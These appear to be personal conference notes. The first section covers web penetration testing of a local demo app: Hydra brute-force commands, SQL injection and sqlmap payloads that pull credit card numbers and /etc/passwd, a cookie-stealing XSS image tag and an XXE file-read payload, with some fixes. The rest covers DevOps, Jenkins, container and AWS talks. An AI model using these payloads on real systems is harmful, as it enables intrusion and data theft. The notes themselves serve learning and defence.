A/B Testing - Two groups of users (A and B) interact with different versions of the app (e.g. a different design). The version with the better conversion rate wins.
http://christian-schneider.net/downloads/Toolbased_WebPentesting.pdf
FindBugs + FindSecurityBugs - Plugins in Eclipse
CVE-ID - One vulnerability in the CVE registry; includes a severity score
CVEDetails.com - Publicly known vulnerabilities, e.g. Tomcat 7.0.61: https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-887/version_id-190760/Apache-Tomcat-7.0.61.html
- Search by version numbers
exploit-db.com - Exploits with code ready to use (i.e. a Python code snippet to trigger the vulnerability)
exploits.shodan.io
Nikto
- Scans the web server and checks for vulnerable files
> nikto -h http://localhost:8080
- Executes thousands of HTTP requests to check whether anything is vulnerable (not exploiting -> rather fingerprinting)
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 127.0.0.1
+ Target Hostname: localhost
+ Target Port: 8080
+ Start Time: 2017-06-12 04:19:37 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Server leaks inodes via ETags, header found with file /examples/servlets/index.html, fields: 0xW/7139 0x1427457886000
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ /manager/html: Default Tomcat Manager / Host Manager interface found
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/status: Default Tomcat Server Status interface found
+ 7677 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2017-06-12 04:19:52 (GMT-4) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
OWASP ZAP
- THE pentester's/hacker's IDE
- Local proxy server -> configure any kind of web client (e.g. a browser) -> all traffic emitted by that client goes through this proxy
- Proxies HTTP and HTTPS traffic
- Sniffs the network
- Intercepts web traffic
- Puts us in control so we can attack the server more effectively
- We can also route our smartphone through this proxy (to inspect mobile apps talking to a backend REST API)
- Intercepting Proxy
- There is a Plugin for ZAP to import a Swagger definition file: zaproxy/zaproxy#2034
- Change the Port to another port (Tools > Options > Local Proxy): 4711
- Set Proxy in Firefox (empty the "No Proxy for" stuff)
- Request to our webserver
- See the requests in ZAP
- Toggle to intercepting Mode (Breakpoint mode)
- Request to our webserver
- Go to the Break tab
- Change the payload of the request in this tab
- Hit "Go to next Breakpoint" (Play button)
- Hit "Show hiden fields" (lightbulp) - Shows all hidden fields in the webbrowser
Passive Scan Mode (the default, as it is non-invasive)
- Tab "Alerts"
- Shows possible vulnerabilities
Active Scan Mode
- Attacking while traversing through the application
- It automatically injects SQL + XSS payloads and permutes every input vector of each request
- There is a Jenkins plugin which executes a ZAP active scan in headless mode
- You can export an HTML report of the active scan
- Right Click in ZAP on the Site: Add to Context > Add to default context
- Now the site has a target symbol
- Click ATTACK Mode (HINT: Now you are in "Scan as you surf"-Mode)
- Now it is attacking (in the Active Scan Tab)
- Now click on a Link on the webpage
- Now it scans this new site
- When you go to the previous site it doesn't get scanned again
Active Mode Settings
- Scan Policy - How deep should the scan reach (Analyze > Scan Policy Managers)
- Active Scan Input Vectors - (Tools > Options)
Plugins
- Advanced SQLInjection Scanner (derived from SQLMap) --> every active scan includes this SQLMap functionality
Arachni - http://www.arachni-scanner.com/
- CLI
- Not part of Kali Linux by default
- Point to your test system and let it run
- Ruby based
- can serve a UI
- Provides a headless PhantomJS based browser cluster (takes a lot of resources)
- A scan takes long (so execute it only in a nightly build)
- It is better at spidering JavaScript-based apps than ZAP's spider
- You can provide a login script
- Nice HTML Report
Hydra
- CLI tool
- Supports many services and brute-forces logins against them
- Brute-force with a password list as a seed
- There are password lists inside of Kali Linux: /usr/share/wordlists/rockyou.txt.gz
- Or on GitHub: danielmiessler/SecLists
- Login request on our site (proxied through our ZAP)
- Take a look at the request in ZAP
- Use the form input fields from the login request as our seed
- Use top-pw-cracking-list.txt
- > hydra
hydra -t 4 (number of threads) -f (stop on the first finding) -l admin (user to brute-force) -P top-pw-cracking-list.txt (password list) localhost (host) -s 8080 (port) http-post-form (service) "/marathon/secured/j_security_check:j_username=^USER^&j_password=^PASS^:Wrong"
("Wrong" is the string in the response body that marks a failed login attempt)
> hydra -t 2 -f -l admin -P top-pw-cracking-list.txt localhost -s 8080 http-post-form "/marathon/secured/j_security_check:j_username=^USER^&j_password=^PASS^:Wrong"
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2017-06-12 05:31:37
[DATA] max 2 tasks per 1 server, overall 64 tasks, 1001 login tries (l:1/p:1001), ~7 tries per task
[DATA] attacking service http-post-form on port 8080
[8080][http-post-form] host: localhost login: admin password: password
[STATUS] attack finished for localhost (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-06-12 05:31:38
SQL Injection
- Java: easy to fix with prepared statements (see the sketch below)
Possible Injection Strings
- '
- or 1=1 --
- and 'a'='a
- etc. quoted and unquoted
Boolean blind test (for an unquoted SQL injection -> no ' is needed)
- Request to http://localhost:8080/marathon/showResults.page?marathon=2
- Request to http://localhost:8080/marathon/showResults.page?marathon=2 AND 1=1
- Request to http://localhost:8080/marathon/showResults.page?marathon=2 AND 1=2
In the code, the SQL query is built via string concatenation
- marathonId is "tainted" as it comes from the outside
- finishedFilter isn't "tainted"
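A minimal sketch of the prepared-statement fix in Java (connection handling and the column names are assumed; the runner table appears in the sqlmap demo further down):
    import java.sql.Connection;
    import java.sql.PreparedStatement;
    import java.sql.ResultSet;

    // Vulnerable: the tainted marathonId is concatenated straight into the query
    // String query = "SELECT name, finish_time FROM runner WHERE marathon_id = " + marathonId;

    // Fixed: a prepared statement keeps data out of the code
    PreparedStatement ps = connection.prepareStatement(
            "SELECT name, finish_time FROM runner WHERE marathon_id = ?");
    ps.setInt(1, Integer.parseInt(marathonId)); // bound as data, never parsed as SQL
    ResultSet rs = ps.executeQuery();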
Find out table and column names
- By selecting meta tables/views (i.e. PG_TABLES in PostgreSQL)
- By using UNION
- SELECT ... FROM ... WHERE UNION SELECT ... FROM ... WHERE ...
- Prerequisites for our UNION
- Same number of columns that the original SELECT has
- Same datatypes that the original SELECT has
- Use null because null is datatype independent: SELECT null, null...
- The Resulting Injection String: UNION SELECT null, null, null FROM information_schema.columns WHERE table_schema='PUBLIC'--
- Use the "--" at the end to comment the rest of the query out
- Shift a string 'X' through the SELECT columns until we find a column that accepts a string as its datatype: UNION SELECT 'X', null, null FROM information_schema.columns WHERE table_schema='PUBLIC'--
- When we have found a matching column: get the column datatype and the column name by inserting the following instead of the 'X':
- ???
- We can then select the credit card numbers with the following (the runner table shows up again in the sqlmap shell below):
- UNION SELECT creditcard_number, null, null FROM runner--
- Determine table names or other column values by using DB timings with the ASCII() and sleep functions and CASE WHEN inside the WHERE clause.
- If the first char has an ASCII value lower than 100, sleep 3 seconds. If the request now takes 3 seconds, you know the first char's ASCII value is between 0 and 100; narrowing that range (binary search) determines the exact char.
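A hypothetical injection string for the unquoted marathon parameter above (PostgreSQL flavour using pg_sleep; pg_tables is a real system view, everything else is illustrative):
    2 AND 1=(SELECT CASE WHEN ASCII(SUBSTRING((SELECT tablename FROM pg_tables LIMIT 1), 1, 1)) < 100 THEN (SELECT 1 FROM pg_sleep(3)) ELSE 1 END)
If the response takes ~3 seconds, the condition is true.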
sqlmap
- CLI
- Performs checks (time-based as well)
- Does all of the above automatically
- sqlmap --flush-session -u http://localhost:8080/marathon/showResults.page?marathon=2
- Tests if a certain request is injectable
- sqlmap --dbs -u http://localhost:8080/marathon/showResults.page?marathon=2
- Enumerates the available databases/schemas
- sqlmap -D PUBLIC --tables --columns -u http://localhost:8080/marathon/showResults.page?marathon=2
- UNION trick: grabs the results from the response and presents them nicely: shows all tables with their columns and datatypes
- sqlmap --sql-shell -u http://localhost:8080/marathon/showResults.page?marathon=2
- Gives you an SQL shell: SELECT creditcard_number FROM runner;
- Select files from the filesystem (e.g. /etc/passwd)
- Create a table "mytemp" within the sql-shell
- Use PostgreSQL's CSV import feature (COPY mytemp FROM '/etc/passwd') within the sql-shell
- Select from the "mytemp" table within the sql-shell --> now we can read the content of the passwd file :)
Source - origin of malicious data: everything coming from a request (input vector / what an attacker can modify)
Sink - a function call whose arguments the attacker ends up controlling 100%
A source finds a way into a sink --> vulnerability
Taint Tracking - trace the request from source to sink
Taint Flow - the path tainted data takes from a source to a sink
XSS
- Top 3 in the OWASP Top 10
- With XSS we can do everything the user can do
Three Types of XSS
- Reflected XSS - directly reflected in the browser after inserting a vulnerable string (just one user interaction)
- Persistent XSS - the malicious code sits inside the DB and pops up on every refresh
- DOM-based XSS - JavaScript-based
<img src="//localhost/myimg.png" onload="this.src='//localhost/log.jsp?value='+document.cookie">
HttpOnly - Can be set on cookies so that they can't be read by (malicious) JavaScript
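A minimal Servlet 3.0+ sketch (cookie name and value are illustrative):
    import javax.servlet.http.Cookie;
    import javax.servlet.http.HttpServletResponse;

    Cookie session = new Cookie("JSESSIONID", sessionId); // illustrative name/value
    session.setHttpOnly(true); // invisible to document.cookie
    session.setSecure(true);   // only ever sent over HTTPS
    response.addCookie(session);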
Escape out of an attribute (e.g. title)
<button title="Inserted the value of 2">Back</button>
- Inserting
<script>alert(1)</script>
would result in: <button title="Inserted the value of <script>alert(1)</script>">Back</button>
(the payload stays inside the attribute, so nothing executes)
- But with
"><script>alert(1)</script>
it results in: <button title="Inserted the value of "><script>alert(1)</script>">Back</button>
(the "> closes the attribute and the tag, so the script executes)
BeEF - Browser Exploitation Framework
- Ruby-based tool
- Abuses XSS vulnerabilities
- Provides a UI (built with Ext JS)
- The victim's browser sets up a WebSocket connection to the BeEF server
- The attacker sees the online clients in the UI
- The attacker can execute stuff on the client + read values out of forms etc.
- openbugbounty.org
- Publicly known XSS vulnerabilities of websites
XXE - Uploading an XML file
- Include an inline DTD in the XML --> the XML parser reads the /etc/passwd file and writes it into the XML:
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY cool SYSTEM "file:///etc/passwd">
]>
<myType>
&cool;
</myType>
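On the defensive side, a sketch of hardening a JAXP parser against exactly this attack (the feature URIs are the standard ones from the OWASP XXE prevention guidance; file handling is assumed):
    import javax.xml.parsers.DocumentBuilderFactory;
    import org.w3c.dom.Document;

    DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
    // reject any DOCTYPE -> inline DTDs like the one above fail hard
    dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    // belt and braces: no external entity resolution
    dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
    dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
    Document doc = dbf.newDocumentBuilder().parse(uploadedXmlFile);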
OWASP
- Non-profit organization
- Best practices on how to pentest
- Top 10 vulnerabilities
- They provide an "Intercepting Proxy", OWASP ZAP (already included in Kali Linux)
- HTTPS everywhere
- Don't mix data with code (i.e. string-concatenating a SQL query with variables inside)
- Don't store files uploaded by users in the filesystem --> use the DB with LOBs instead
10:15 - 11:15 (SAAL MARITIM B/C) - Challenges in Release Management for complex and highly regulated Environments
What drives DevOps?
- We have to be faster than before
- Cloud
- Multi-Channel (i.e. Voice-Channel: Alexa)
- Time-to-Market (automated release approach)
Complex dev environment
- A lot of agile teams
- Separate release streams
- Different technology stacks with different tools
- Dependencies between applications
Regulations
- PCI - WHAT!?
- SAE - WHATTTT
- FDA - Hmm?
- Automotive Spice - WTF?
Core Principles
- Traceability
- Responsibility
- Audit-safe - not changeable (immutable audit records)
What do we have to do?
- Efficient delivery framework
- Make the toolchain changeable (e.g. will your toolchain support serverless in the future?)
- Higher agility (i.e. Product Managers have to work more agile)
- Communicate successes/achievements inside of the company (i.e. Testers didn't know that there is an automated provisioning system for test platforms)
Requirements on our toolchain
- The pipeline process has to be visible
- Dependency Management
- Quality Gates
- Cross Pipeline reporting
- ...
Problem: 300-400 tasks across stages from dev to prod
Only 5% of 1,000,000 deployments reach production
- Why? Because they miss quality gates in the pipeline
How to do it with so many tools?
- Dev > Build > Integrate > Test > Release > Deploy > Operate
- What tool is the market leader for doing all these things?
- Most companies do it with an Excel list (document the Release Process with start/end dates, durations, team members for each individual application)
- They require weekly + daily release meetings
- The Release Manager asks you: Is this or that done yet? - No because we have to wait for another person outside of the team to do stuff
- Integrate everything in the release process
- Change Management DB - What has been released etc.
The Big Picture
- Release Pipeline Diagram
- Two different Artifactories, one internal and one for production
- ...
AWS + CloudFoundry + OpenStack
- Pipeline
- -> Internal Cloud (CF + OpenStack)
- -> AWS
- -> ...
Pipeline for a Pipeline
- Development Pipeline --- All pipeline changes are tested first ---> Production Pipeline
Self service onboarding (What?! :D)
- Diagram
- Developers
- -> XL-Release (AppName, GitHub Repo, etc. provided by the developers)
- -> Pipeline
X-File - a Groovy DSL to define your release pipeline in XL Release
- Defines Phases
- Has a Task (i.e. to wait for something (QA))
- Has Dependencies
XL-Release provides a Web UI
- A board for a release (flow - for business people)
- A calendar with planned releases and their dependencies (e.g. somebody has to install a test system on a machine)
- This UI tries to replace an Excel sheet
- It also tries to replace e-mail
- Compliance
- Rights Management (Who can start/abort a release etc.)
- Auditing
- Reporting - Who did what?
- Traceability - Where are we in the release process?
How to deploy
- Deploy to a cluster
- Make a smoke test
CD books tell you: when there is an error -> don't fix the symptoms -> "press the red button" -> fix the source of the error -> retrigger a new deployment
Customer: RBB
- rbb-online.de
- rbb24.de
- Problem: millions of requests on the news page (e.g. during the terror attack)
- --> Buy new hardware or go to the cloud
- There are high peaks on the "Sandmann" webpage while the Sandmann show is running on TV
- They moved to the OTC (Open Telekom Cloud)
Load Testing with Monitoring
- CLI Monitoring Tool: Taurus
- Visible as a graph in the CLI
- 20 concurrent users
- 20 active users
- nload - CLI Tool that monitors the current network traffic (In and Outgoing) on the console
- Jenkins Slave on the OTC triggers the Load Test
- Produces an XML Report with a Graph of all the instances running over time
Taurus
- CLI tool
- Can trigger JMeter
- Configured in a YAML file (Taurus generates a JMeter test plan from it when using the JMeter executor)
- Define concurrent clients firing requests
- Define scenarios
- Requests to http://...
- Define Reporting
- Define Criteria when to fail the test (i.e. max response time)
- Tests an Auto Scaling Group in the OTC
JMeter
- Don't use GUI mode for load testing
- There is a headless mode to run the load test
- Configuration + scripting is bad in the GUI, better do it with Taurus' YAML file (see the sketch below)
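A minimal Taurus YAML sketch of the setup described above (URL, durations and thresholds are assumptions); run it with bzt load.yaml:
    execution:
    - executor: jmeter      # Taurus generates the JMeter test plan from this
      concurrency: 20       # concurrent users
      ramp-up: 1m
      hold-for: 5m
      scenario: homepage
    scenarios:
      homepage:
        requests:
        - http://localhost:8080/
    reporting:
    - module: final-stats
    - module: passfail      # fail criteria, e.g. max response time
      criteria:
      - avg-rt>500ms for 30s, stop as failed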
OTC - Based on OpenStack
- Auto Scaling
- Multiple Groups
- With multiple Instances
- Hosted in Magdeburg and Biere
RBB
- Images are built on the OTC with Ansible via Jenkins and are published in a private registry
- Automated Load- and Performance Testing
- Webcaching Layer on OTC
- HAProxy
OpenStack
- Growing ecosystem
Pets vs. Cattle - pets are servers you nurse back to health when sick; cattle you simply replace (see the ING notes below)
Jump Host - a hardened host that serves as the single entry point into the otherwise closed network
VPC - Virtual Private Cloud (an isolated virtual network in the cloud)
ECS - Elastic Cloud Server
- Name
- Type
- Number of vCPUs
- Memory
- Image Type
- Image
- Network
- Which VPC
- IPs
Public Images (Latest OS Base Image) -> git Repo (managed by DevOps Team) -> Development VCS (Temp. Server v1) -> Private Images (Custom Server Image v1) -> Production VCS (Ephemeral Server v1)
Automated Testing
- Change to the Code (Git checkin)
- Pipeline is triggered
- Image is created
- Functional Image is created
- Image is deployed on the OTC
Overview
- Jenkins Master in Customer Site
- Git Repo in Customer Site
- Jenkins Slave in VPC
- A VPC for Testing
- A VPC for Production
Rolling Update (Updates without any Downtime)
- Change the config in one Auto Scaling Group
- A new instance with the new config is starting up
- Now two instances are running in the same Auto Scaling Group
- The new instance shows the new content
- Trigger the down-scaling in the UI
- Now only the new version is live
ING (Bank)
The last agile mile
2012
- Commerce
- Application dev
- Application ops
- Infra dev
- Infra ops
2013
- Commerce
- Agile / Scrum
- Application ops
- Infra dev
- Infra ops
2014
- Commerce
- DevOps (CD) 118 Teams
- Infra dev
- Infra ops
2015
- BizDevOps (Tribes & Squads) 400 Teams
- Infra dev
- Infra ops
2016
- BizDevOps (Manual IT Risk + Private Cloud)
- Infra ops
IT-Risk
- Policy
- Principle
- Control Framework
- Pipeline
Principles
- Speed - No longer fill out forms
- Outcomes over Impositions
- Outcome - not a filled-in form, but meetings
- Shift-Left - Nobody patches apps in production without going through QA
- Human vs. Robots
- Immutable Servers
- Cattle and Pets
- Pet - server in prod -> goes to the doctor when it's sick
- Cattle - Get another one when it is sick
- Infrastructure = Code
- Robots = software
- Humans leverage automated pipelines
Learning organization
- Weird assumptions about the roles of a software engineer
- Designer
- Coder
- Tester
- Deployer
- Requirements Specifier
- Solution Architect
- ...
- ING changed HR
Complex Apps are best managed with Feedback loops
Feedback Loops
- Need to be designed
BizDevSecRiskOps
- Shift Left
Twitter: @henkkolk
They moved from Jenkins 1 to Jenkins 2 with CD
Continuous Delivery vs. Continuous Deployment
- Continuous Delivery - stops before production (merge to the master branch and build your artifact, but it does not automatically go to production)
- Continuous Deployment - every successful build goes to production
Diagram
- Handler (entry point: it is time to do something, e.g. a git merge)
- VM or Container that is clean and is similar to your production system: A place to run your tests
- Tests failed - do something (i.e. open an issue)
- Tests ok - do something
Continuous Delivery
- Increase the number of releases
- Build > deploy code in a safe env > run tests > deploy
Continuous Integration
- Integrate new code into the old code: is the new code compatible with the old code?
- Run security tests in this phase
- GitHub lets Jenkins check whether the new code is compliant (the merge button is disabled when it is not)
Why use Continuous Delivery?
- Stay focused on business
- Reduce human errors - a cycle that repeats over time (we humans are not good at those boring tasks)
- Configure Jenkins to send notifications to your communication channel of choice (e.g. Slack, Telegram or e-mail)
- Keep developers focused
Terminology
- Release
- Artifact/Artefact
- Pipeline - the tunnel our code follows from the VCS to the environment (define it via a Jenkinsfile)
- Continuous Delivery
- Continuous Integration
- Continuous Deployment
- Rollback - a deploy can fail / can break the system. Hard topic. When something breaks: redeploy from an older version in git (complex systems: snapshots)
- CI server - Jenkins
- Job - Single Pipeline that starts when code is merged
Unique Pipeline
- Has to be unique
Speedy
- Make your pipeline fast (i.e. split your pipeline / parallelize your pipeline)
- Run smoke tests on merge to master, in parallel with static analysis of the code
Reproducible
- You can reproduce the env on your local environment
Versionable
- Changes get lost in Jenkins when someone comes along and edits the settings of a Jenkins job --> bad.
- Jenkins Pipeline Plugin - pipeline as code: put a file (Jenkinsfile) in your VCS so settings are updated via a git merge. It grows with your application (and makes rollbacks comfortable)
Track! Track! Track!
- Monitor the productivity and mark your important steps
- Mark a deploy to understand the changes
- Red vertical lines in a graph (Grafana) mark a new deploy, so you can see how the new version behaves (easy comparison)
- Organize a party :D
Communication Layer
- Goal: keep people out of the Jenkins UI
Create Strong integration
- Work hard to keep your pipeline efficient
Staging Environment - Improvements
- 4 Environments
- A new PR is opened
- Job: PR Checker (3 minutes)
- Periodic job that runs the unit tests with code coverage (split from the PR Checker to keep the pipeline fast) (18 minutes)
- Merged to develop
- Job: Artifact Creator - creates the artifact
- triggers: Job: Staging - copies the artifact + starts a secondary Tomcat
- Testing begins
- Post Staging Acceptance
- Job: Deploy Pre Production (1 minute)
- Testing Complete
- Job: Release to Production (25 sec)
- Sanity Checks Complete
- Job: Merge (2 minutes)
- Job: Release
His Workflow
- Merge feature branch to develop
- run unit test + run static analysis + docker build + deploy to acceptance
- merge develop to master (if 2. is working)
- run unit test + run static analysis + docker build + deploy to production
His optimizations to his workflow
- Merge to master and use the same docker image in dev and prod
- Snapshot rollback
The Jenkins server is the single door to release to production
- monitor - Monitor your servers
- logs - tail the logs
- recovery - Jenkins can fail --> have a recovery system
- HA - high availability
- scalability - Jenkins supports multi-node environments with Jenkins workers (scale your Jenkins by adding new nodes)
- ❤️ your CD process
Backup / Restore policy
- What happens during disaster?
- Are we able to recover?
- He backs up JENKINS_HOME, excluding plugins
- There are plugins for that but he uses scripts to do it
Pipeline as code
- Groovy DSL
- Script it rather than configuring it in the Jenkins UI
node {
    stage("Checkout") {
        git branch: "master",
            credentialsId: "github-asdf",
            url: "https://github.com/example/repo.git" // placeholder repo URL
    }
}
Trigger a build with Hubot
- Built by GitHub
- Chat with the robot. It takes the message and deploys it
- JavaScript + NodeJS
- Slack has a public protocol
Blue Ocean
- New UI for Jenkins
- It is a plugin for Jenkins
- New fancy way to manage pipelines
(Jenkins) Plugins as code
- It is not easy to do
- Specify a list of plugins that you need
- Bash Script: install-plugins.sh (look it up on GitHub)
- Reads the file with all the plugins that you specified and installs them in Jenkins
- Problem: Plugin Versions
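A sketch of how this looks in a custom Jenkins Docker image (plugin names/versions are illustrative; install-plugins.sh ships with the official jenkins image):
    # plugins.txt - pinning versions addresses the version problem
    git:3.3.0
    workflow-aggregator:2.5

    # Dockerfile
    FROM jenkins:2.60.1
    COPY plugins.txt /usr/share/jenkins/ref/plugins.txt
    RUN /usr/local/bin/install-plugins.sh < /usr/share/jenkins/ref/plugins.txt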
@gianarb http://gianarb.it
16:45 - 17:45 (SAAL MARITIM B/C) - Continuous Delivery with Containers: The Good, the Bad, and the Ugly
O'Reilly book: "Containerizing Continuous Delivery in Java"
Containers + CD
- Push something (the container image) down the pipeline that stays the same (no variations)
- Adding metadata to container images is vital
Continuous Delivery
- Book "Continuous Delivery"
- Not "necessarily" Continuous Deployment
- A build pipeline is mandatory
- DEV > QA > STAGING > PROD
Containers + CD
- Container image == 'single binary' - the single thing that goes down the pipeline (like a .war)
- Impacts QA (no longer pulling down a .war or .jar) and Production
Pipeline for Containers
- Local should be as close to production as possible
- Locally use the same image as in production (Alpine vs. CentOS etc. --> decide!)
Telepresence
- Tool when working with Kubernetes
- Work locally and running on a cluster
Hoverfly
- Tool to mock out APIs
- Doing this by recording or simulating traffic
- Synthetic APIs to work locally
Dockerfile (super important) - open question: one Dockerfile for local development and production?
- OS choice
- Configuration
- Build artifacts
- Exposing ports
- Language specific stuff
- JDK vs JRE + Oracle vs OpenJDK
Different test and prod containers?
- DB in the test container
- Better use a "test sidecar container" with all the other tools that you need (Selenium etc.) - look up the blog post on this slide!
- Docker multi-stage builds - interesting idea
Building images with Jenkins
- CloudBees has nice open-source plugins for Jenkins to build images
Storing in an image registry
- DockerHub
Metadata - Adding data as it goes down the pipeline
- Who built it etc.
- Version your Images
- "Latest" Tag in Docker
- HINT! It means the last build tag that run without a specific tag/version specified!
- DONT USE LATEST: Everytime version it with a version
- Application Metadata
- Version (semver)
- GIT SHA
- Build metadata
- build data + image name + vendor
- ...
- QA control
- Security audited
- Adding labels at build time (see the sketch after this list)
- Docker labels
- Labelling (look it up on GitHub)
- Create file '/hooks/labels'
- You can add data on build time
- label-schema.org
- microbadger.com
- Adding Labels at runtime can be done...
- docker run -d --label ... (the label can be committed back into the Docker image --> but that creates a new image)
- Best solution: A registry with metadata support: JFrog Artifactory or NexusOSS (Modify the metadata in the registry rather than in the image itself)
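A sketch of build-time labelling with the label-schema.org names from above (image name and version are placeholders):
    docker build \
      --label "org.label-schema.vcs-ref=$(git rev-parse --short HEAD)" \
      --label "org.label-schema.build-date=$(date -u +%Y-%m-%dT%H:%M:%SZ)" \
      -t myapp:1.0.3 .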
Component Testing
Testing: Jenkins Pipelines (as code with a Jenkinsfile --> Creates the Job out of this file)
- Baked into jenkins
- node { stage("asdf") { ... } }
- Stages are shown in Jenkins
Testing individual containers
node {
    stage("asdf") {
        // run the image and wait up to 30s until the /health endpoint returns "UP"
        // (image name and port are placeholders)
        docker.image("myapp:1.0.3").withRun("-p 8080:8080") { c ->
            sh 'timeout 30 bash -c "until curl -fs http://localhost:8080/health | grep -q UP; do sleep 1; done"'
        }
    }
}
Docker Compose + Jenkins Pipeline
node {
    stage('end-to-end tests') {
        // bring the composed environment up, run the tests, tear it down
        sh 'docker-compose up -d'
        ...
        sh 'docker-compose down'
    }
}
Testing NFRs has to be in the build pipeline!!!
- Performance + Load testing
- Gatling (Scala-based DSL: better than JMeter) / JMeter
- Flood.io - commercial product, takes your Gatling script and spins up Amazon machines
- Security testing
- Findsecbugs / OWASP Dependency Check
- BDD-Security (wrapper around OWASP ZAP) / Arachni (more a JavaScript pen-testing tool -> covers the basics)
- Gauntlt / Serverspec
- Docker Bench for Security / CoreOS Clair
Delaying NFRs to the "Last Responsible Moment"
- "We are agile" so we can implement security checks and stuff later... --> WRONG!
Mechanical sympathy: Docker and Java
- The JVM derives its default heap size from the machine's RAM (which doesn't respect Docker container limits)
- Memory problems
- Container with 2 GB memory == 2 GB heap? No! Don't give all of the container's RAM to the heap!
- Entropy problems (with no peripheral devices attached there is little entropy --> Java can block when generating secure random values)
- TEST those things in your pipeline!!!
Observability is core to continuous delivery
- READ! InfoQ: The Challenge of Monitoring Containers at Scale
Containers are not a silver bullet
Container Platform
- OpenShift is nice for that
- Book: Infrastructure as Code
Summary
- Continuous Delivery is vital
- Container images must be the single source of truth within the pipeline
- Metadata is added along the pipeline
- Mechanical sympathy is important
- ...
Books
- Continuous Delivery
- Building Microservices
- Microservices
- More Agile Testing
- ... look them up on the slides
DevOps Weekly Newsletter
@danielbryantuk
ECS Cluster
- Includes Container Instances with an ECS-Agent (Docker container as well)
- ECS-Agents communicate with AWS to start new instances if needed
ECS Cluster - Deployment Options
- AWS Console
- Easy to start
- UI on the Website
- AWS CLI
- Not easy to start
- Automation is possible
- A script can get complicated and very verbose (not what we want)
- ECS CLI
- It is easy to start
- Automation is possible
- With one command a cluster is up
- But don't use it in production
- Cloud Formation
- YAML File -> Send this to the CF Service -> Does the things that need to be done
- Changes to this File result in the required changes
Parameters:
  KeyName: ...
Resources:
  ECSCluster: ...
  ECSAutoScalingGroup: ...
  ...
ECR - The Docker registry in the AWS
The first deployment
- Describe the container on first deployment
- Image
- Port mapping
- Mount points
- Network options
- Docker options
- Task Definition - Contains Containers
- IAM Task Role - grants the containers in the task AWS permissions
- Volumes
- Network Mode
- Task Placement Constraints
- Service Description - Contains a Task
- Loadbalancer
- AutoScaling - Based on metrics: Please scale up etc.
- Deployment Configuration
- Task Placement Strategy
The ECS CLI can consume a Docker Compose file and generates a task definition from it
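A sketch (project name and compose file are assumptions):
    # creates a task definition from the compose file and starts the task on the cluster
    ecs-cli compose --project-name myapp --file docker-compose.yml up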
Load Balancing
- Static port mapping in the old load balancer (ELB) (not the best solution for containers)
- New load balancer (Application Load Balancer, ALB) - HTTP only - define rules etc.
- Provides dynamic port mapping
Scaling (Up & Down)
- CI1
- T1
- T2
- T3
When an alarm happens (In the Task Definition): Scale up
- CI1
- T1
- T2
- T3
- CI2
- T4
AutoScaling: Rule of Thumb
- Threshold = (1 - max(Container Reservation) / Total Capacity of a single Container Instance) * 100
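Worked example (numbers assumed): with a max container reservation of 512 MB on container instances with 2048 MB capacity, Threshold = (1 - 512/2048) * 100 = 75, i.e. raise the scale-out alarm once 75% of the instance capacity is reserved.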
One Metric to scale them all
Node Draining
- Is needed when a new version of the application is available
Best Practices for Continous Delivery
- ASG UpdatePolicy: Wait for resource signals
- cfn-init: Ensure Docker and ECS-Agent is running
- UserData: Use build number to enforce new EC2 instances
Volumes
- Not supported or built in :(
- 2 Options: EBS and EFS
- EBS - no automatic scaling
- EFS - Elastic File System - scales automatically - pay for what you use
Security
- IAM Security Roles
- iam.cloudonaut.io
ECS-Agent creates Tasks and talks to them via iptables
- Tasks shouldn't connect to the Metadata service
What is missing here?
- Monitoring
- ...
His wishlist for AWS
- Support all Docker features (e.g. HEALTHCHECK)
- Security groups for containers
- Support volumes natively
- ...
boards.greenhouse.io/scout24
@pgarbe
Netflix provides a client.jar for other services
- So they can reference it in their build.gradle file as a dependency
- This client.jar has dependencies as well and pulls them into the current service
Netflix uses Artifactory from JFrog
Solutions to the version problem
- deal with it
- share nothing or little
- Monorepo
- all code in a single repo
- no versions
Netflix' approach to this problem
- Astrid - checks via Artifactory which project uses which dependency in which version
- Niagra - pulls the new version of a jar into all dependent projects and checks whether those projects break
- When a project is OK with the new version, Niagra updates the version of this dependency in the project's VCS and triggers a build pipeline to check whether it works --> then a PR is issued on those projects
@sonofgarr
Centralized Log Management - receive the log in raw format and save it first
- Where do you store the logs from your application (log4j etc.)? --> Configure them to write to files / stdout --> Docker is a change, as it writes to stdout and stderr
- Log format: human-readable, but we want structured data
- How do we get structured data in a human-readable format?
- Logshippers do collect files
- Log Parsers use regexps to parse the logs
- When structured we can put it to ElasticSearch
- Bulk Indexing with ElasticSearch
- After Indexing the logs are searchable
Server/Container/App -> Log Shippers -> Centralized Log Management / Logsene
Monitoring
- Similar setup, but even more tools are involved
- Collect the metrics periodically and ship them to a backend -> Time Series DB
Server + App /Container Configuration -> Monitoring Agents -> Time Series DB -> Dashboard Tools, Alerting Tools, ChatOps Tools
Time Series DB
- find the minimum value over time
On top of the Time Series DB there are visualization tools
- e.g. Grafana / Kibana
- Slack Channels for Alerting
Decide on the Time Series DB first
- All the other tools are bound to it
